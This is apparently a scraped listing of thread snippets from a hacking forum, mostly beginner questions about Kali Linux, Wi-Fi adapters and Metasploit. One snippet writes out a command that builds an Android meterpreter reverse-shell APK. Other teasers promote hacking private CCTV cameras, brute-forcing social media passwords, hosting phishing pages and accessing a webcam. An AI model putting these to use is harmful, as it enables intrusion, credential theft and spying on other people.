SORRY, THIS WEB-PAGE IS NOW (Almost) CLOSED...!!!
Hi Null Byte, After going through numerous articles, forums and videos all over internet, i can not find any help on the subject .
Hi, Metasploit was updated recently (or, at least, since the last time I used it), and one large thing, is msfpayload was removed, and replaced with msfvenom. I used to be able to just do msfpayload android/meterpreter/reverse_tcp LHOST=ip R > /root/name.apk
Hi I have two mac devices I would like to protect. We have Mac OS High Sierra on both. Reasonably healthy password habits.
NEW VERSION : https://Null-byte.wonderhowto.com/Forum/Hacking-Facebook-Twitter-Instagram-Account-Passwords-with-Bruteforce-0181808/
Video: . Video: .
Hello This Is The 4th Video Of serious Welcome Whole Course Beginner To Advance Level Hacking Enjoy For free
Forum Thread: 5.Secure Sockets Layer SSL and Transport Layer Security TLS||Beginners Guide to Encryption
This Will End Soon Just Make Sure U R There In Another Serious
Hey Sup hackers, I installed kali Linux (Linux kali 5.2.0-kalu2-amd64 #1 SMP Debian 5.2.9kali1 (2019-0822) x86_64 GNU/Linux) on live usb persistence mode as per the guidelines given on kali documentation.
i really dont know what im doing wrong but when i type proxychains firefox (website) nothing happens
i donot have a external wireless adapter that supports monitor mode and i wanted to practise MITM attacks so i wanted to know does MITM attack needs monitor mode to be enabled? i am using kali on vmware i can perform attack on another virtual os on my pc with nat but can i attack other device on my network by keeping the network in bridged mode?
Hello techies? There's this partnership between Samsung, Safaricom and M-kopq, in which they provide Galaxy A10s phone to be paid on hire purchase. The buyer has to pay on a daily basis, else he is locked out of the device.
Hi guys, Im running Kali Linux as my machine, and I have an RX580 Graphics Card that I would like to make use of!
Hi Friends. Now a days CCTV cameras are used many place like shops, malls, offices, warehouse etc and more. for security reason and for many more purposes. This articles show you how to hack CCTV cameras. If search on Google for CCTV camera hacking , you will be find tricks for public CCTV camera hacking tricks. But here you will be hack private CCTV cameras .
Sorry. It is Bruteforce again. If you saw my tutorial on getting Instagram accounts passwords, there were lots of complains that the script was no working well. Well, that was not my script, so I decided to make one myself instead.
Forum Thread: How to Get Social Media Accounts and Real Name from the Footprints Left Behind by a Phone Number
So in here we are about to discuss how social media accounts and real name from just a phone number by analyzing the footprints left behind by it, for this we have a great tool I made myself which can come handy
I know everyone is tired seeing those how-to's on brute forcing instagram and other social media's. Sorry to break this to you but most of them are poorly engineered or do not work at all and claim's false results.
i keep getting the same boot error saying resize root file
Hi everyone, im new in hacking and cracking. i have a prbolem when i use aircrack or fluxion. they have same problem. the problem is mode monitor can't scan anything. I mean, there are many wifi but mode monitor can't scan it. I use this to check
Hello, i have been following some bettercap tutorials from a while and i have learned a lot. The problem im facing is that i have installed bettercap-ui from terminal and it successfully installed but, when i open the ui help menu by typing help ui it gives me an error saying that bettercap-ui has been disabled in kali, try installing it or updating it as shown in figure. I have tirelessly searched google and other forums but none was related this issue. Please guide me for the solution.
Hello there, Recently I have come across many guides about creating phishing pages. Although the principles behind each guide is similar, most of the hosting solutions provided in the guide does not work anymore due to an increase in the crackdown of phishing pages by the hosting companies. In this guide, I will go through every step necessary to create and host a phishing page of your choice. Enjoy!
Forum Thread: How Does Someone Attack Account by Just Having Their @Username ? The Application Is Kik!
some dude was asking for my kik username! and someone provide it to him and now i can't even connect or see the messages! is it ddos attack?
when i tried to open cap file to see captured handshake it shows failed to open what should i do please someone help me?
Why we need wireless Adapter Wireless adapter is very important for wifi hacking activities. Because for wifi hacking, you need to put your network interface in monitor mode. The built in wireless adapter of laptop does not work well for monitor mode. Besides many of us use Kali Linux as virtual machine. In virtual machine, network is shown as cable connected network and it cannot go to monitor mode. So for both of the above causes, we need external wirelss adapter to run in monitor mode.
During CTFs, it's common to encounter some hashes that you may want to crack. You can do it offline by cracking them, you can google them or use a web service that stores massive data about cracked or generated hashes. The best way (if you can't afford cracking them on your own) is to relay on those web sites. But you can't check them one by one until you find a match. So why don't use a tool that does this on its own?
today i am talking about some hacking software that can used for hacking. john the ripper it the best password cracker in windows.you can run john the ripper in command line tool
Tried making some .apk payloads but every single one I made is not working properly. I tried making payloads and remaking original .apk files using msfvenom. When I try to install it it says: Parse error: There is problem parsing the package. I also tried it using some ruby script but same problem occurred. It happens on multiple devices. Anyone knows what I'm doing wrong?
Hi, I am a Kali Linux user, and I used metasploit to get access of the webcam.
Forum Thread: How can i Solve if Pc Installed with Kali Limux Isn't Showing Any Application on Desktop and Anywhere??
Hi sir, Actually i have installed kali linux on my pc, this was my first time to install kali linux. I don't what happened but from when i have installed kali linux, it's not showing not even a single application on desktop or anywhere. There is only one application that i can open is SETTINGS, nothing else, pls tell me how to solve this issue, please please please
some times your pc is freeze or hang so you have to restart your pc but there is a shortcut key that will take you to home screen windows logo key + D
Forum Thread: I Wan't to Learn Pentesting, and Planning to Learn Both C++ and Python. But I'm Not Sure About What I Should Start With?
I want to be able to: Develop malwares and exploits
I'm experimenting with Metasploit and using it on my own machine. I'm running Kali Linux on VirtualBox and trying to open a meterpeter session to my host Win 10 OS.
Forum Thread: #3 Video of Cyber Security Course Free on Youtube About What Is Vulnerabilities,Treats and Does GOV Spy
Learn New Thing and After Theory Part we will Go For some Real World Hacking So make sure you Joins us